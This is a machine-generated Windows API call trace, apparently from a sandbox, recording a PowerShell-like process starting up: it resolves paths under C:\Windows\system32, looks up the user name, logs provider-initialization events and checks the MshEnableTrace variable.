	[0725.786] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14d290, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0725.786] SetErrorMode (uMode=0x1) returned 0x1
	[0725.786] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d4f0 | out: lpFileInformation=0x14d4f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0725.786] SetErrorMode (uMode=0x1) returned 0x1
	[0725.786] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14d290, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0725.786] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14d140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0725.787] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0725.787] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0725.787] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0725.788] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0725.788] SetErrorMode (uMode=0x1) returned 0x1
	[0725.788] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d320 | out: lpFileInformation=0x14d320*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0725.788] SetErrorMode (uMode=0x1) returned 0x1
	[0725.788] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0725.788] SetErrorMode (uMode=0x1) returned 0x1
	[0725.789] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d320 | out: lpFileInformation=0x14d320*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0725.789] SetErrorMode (uMode=0x1) returned 0x1
	[0725.789] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0725.789] SetErrorMode (uMode=0x1) returned 0x1
	[0725.789] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d3c0 | out: lpFileInformation=0x14d3c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0725.789] SetErrorMode (uMode=0x1) returned 0x1
	[0725.791] CoTaskMemAlloc (cb=0x804) returned 0x280bb0
	[0725.791] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x280bb0, nSize=0x14d7c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d7c8) returned 0x1
	[0725.793] CoTaskMemFree (pv=0x280bb0) 
	[0725.793] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0725.793] GetUserNameW (in: lpBuffer=0x2917a0, pcbBuffer=0x14d808 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d808) returned 1
	[0725.793] CoTaskMemFree (pv=0x2917a0) 
	[0725.793] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f38bb8*="FileSystem", lpRawData=0x2f38948) returned 1
	[0725.795] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0725.795] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.795] CoTaskMemFree (pv=0x1b7c99c0) 
	[0725.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0725.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0725.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0725.797] CoTaskMemAlloc (cb=0x804) returned 0x280bb0
	[0725.797] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x280bb0, nSize=0x14d7c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d7c8) returned 0x1
	[0727.486] CoTaskMemFree (pv=0x280bb0) 
	[0727.487] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0727.487] GetUserNameW (in: lpBuffer=0x2917a0, pcbBuffer=0x14d808 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d808) returned 1
	[0727.487] CoTaskMemFree (pv=0x2917a0) 
	[0727.488] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f3e3f8*="Function", lpRawData=0x2f3e188) returned 1
	[0728.870] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0728.870] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.870] CoTaskMemFree (pv=0x1b7c99c0) 
	[0728.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.174] CoTaskMemAlloc (cb=0x804) returned 0x280bb0
	[0731.174] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x280bb0, nSize=0x14d7c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d7c8) returned 0x1
	[0731.176] CoTaskMemFree (pv=0x280bb0) 
	[0731.176] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0731.176] GetUserNameW (in: lpBuffer=0x2917a0, pcbBuffer=0x14d808 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d808) returned 1
	[0731.176] CoTaskMemFree (pv=0x2917a0) 
	[0731.176] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f60c20*="Registry", lpRawData=0x2f609b0) returned 1
	[0732.677] CoTaskMemAlloc (cb=0x804) returned 0x280bb0
	[0732.677] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x280bb0, nSize=0x14d7c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d7c8) returned 0x1
	[0732.677] CoTaskMemFree (pv=0x280bb0) 
	[0732.677] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0732.677] GetUserNameW (in: lpBuffer=0x2917a0, pcbBuffer=0x14d808 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d808) returned 1
	[0732.677] CoTaskMemFree (pv=0x2917a0) 
	[0732.678] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f66038*="Variable", lpRawData=0x2f65dc8) returned 1
	[0732.679] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0732.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0732.680] CoTaskMemFree (pv=0x1b7c99c0) 
	[0732.680] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0732.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0732.681] CoTaskMemFree (pv=0x1b7c99c0) 
	[0732.716] CoTaskMemAlloc (cb=0x804) returned 0x280bb0
	[0732.716] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x280bb0, nSize=0x14d7c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d7c8) returned 0x1
	[0734.184] CoTaskMemFree (pv=0x280bb0) 
	[0734.184] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0734.184] GetUserNameW (in: lpBuffer=0x2917a0, pcbBuffer=0x14d808 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d808) returned 1
	[0734.184] CoTaskMemFree (pv=0x2917a0) 
	[0734.185] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f79c50*="Certificate", lpRawData=0x2f799e0) returned 1
	[0734.831] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0734.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.831] CoTaskMemFree (pv=0x1b7c99c0) 
	[0734.834] GetLogicalDrives () returned 0x4
	[0734.834] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14d450, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0734.835] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0734.836] CoTaskMemAlloc (cb=0x20e) returned 0x2df020
	[0734.836] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2df020 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0734.836] CoTaskMemFree (pv=0x2df020) 
	[0734.837] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0734.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.837] CoTaskMemFree (pv=0x1b7c99c0) 
	[0734.838] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0734.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.838] CoTaskMemFree (pv=0x1b7c99c0) 
	[0734.854] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0734.854] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.855] CoTaskMemFree (pv=0x1b7c99c0) 
	[0734.856] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0734.856] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.856] CoTaskMemFree (pv=0x1b7c99c0) 
	[0734.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0734.857] SetErrorMode (uMode=0x1) returned 0x1
	[0734.857] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d410 | out: lpFileInformation=0x14d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0734.857] SetErrorMode (uMode=0x1) returned 0x1
	[0734.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0734.857] SetErrorMode (uMode=0x1) returned 0x1
	[0736.356] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d410 | out: lpFileInformation=0x14d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0736.356] SetErrorMode (uMode=0x1) returned 0x1
	[0736.356] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0736.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0736.357] CoTaskMemFree (pv=0x1b7c99c0) 
	[0736.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0736.359] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0736.360] SetErrorMode (uMode=0x1) returned 0x1
	[0736.360] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d3d0 | out: lpFileInformation=0x14d3d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0736.360] SetErrorMode (uMode=0x1) returned 0x1
	[0736.360] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0736.360] SetErrorMode (uMode=0x1) returned 0x1
	[0736.360] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d3d0 | out: lpFileInformation=0x14d3d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0736.360] SetErrorMode (uMode=0x1) returned 0x1
	[0736.360] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0736.360] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0736.361] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0736.361] SetErrorMode (uMode=0x1) returned 0x1
	[0736.361] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14d3d0 | out: lpFileInformation=0x14d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0736.361] SetErrorMode (uMode=0x1) returned 0x1
	[0736.361] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0736.361] SetErrorMode (uMode=0x1) returned 0x1
	[0736.361] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14d3d0 | out: lpFileInformation=0x14d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0736.361] SetErrorMode (uMode=0x1) returned 0x1
	[0736.361] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0736.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0736.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0736.362] SetErrorMode (uMode=0x1) returned 0x1
	[0736.362] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d3d0 | out: lpFileInformation=0x14d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0736.362] SetErrorMode (uMode=0x1) returned 0x1
	[0736.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0736.362] SetErrorMode (uMode=0x1) returned 0x1
	[0736.362] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d3d0 | out: lpFileInformation=0x14d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0736.362] SetErrorMode (uMode=0x1) returned 0x1
	[0736.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0736.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0736.363] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0736.363] SetErrorMode (uMode=0x1) returned 0x1
	[0736.363] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14d410 | out: lpFileInformation=0x14d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0736.363] SetErrorMode (uMode=0x1) returned 0x1
	[0736.363] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0736.363] SetErrorMode (uMode=0x1) returned 0x1
	[0736.363] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14d410 | out: lpFileInformation=0x14d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0736.363] SetErrorMode (uMode=0x1) returned 0x1
	[0736.364] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0736.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0736.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0736.364] SetErrorMode (uMode=0x1) returned 0x1
	[0736.364] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d410 | out: lpFileInformation=0x14d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0736.364] SetErrorMode (uMode=0x1) returned 0x1
	[0736.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0736.364] SetErrorMode (uMode=0x1) returned 0x1
	[0736.364] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d410 | out: lpFileInformation=0x14d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0736.365] SetErrorMode (uMode=0x1) returned 0x1
	[0736.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0736.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0736.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0736.367] SetErrorMode (uMode=0x1) returned 0x1
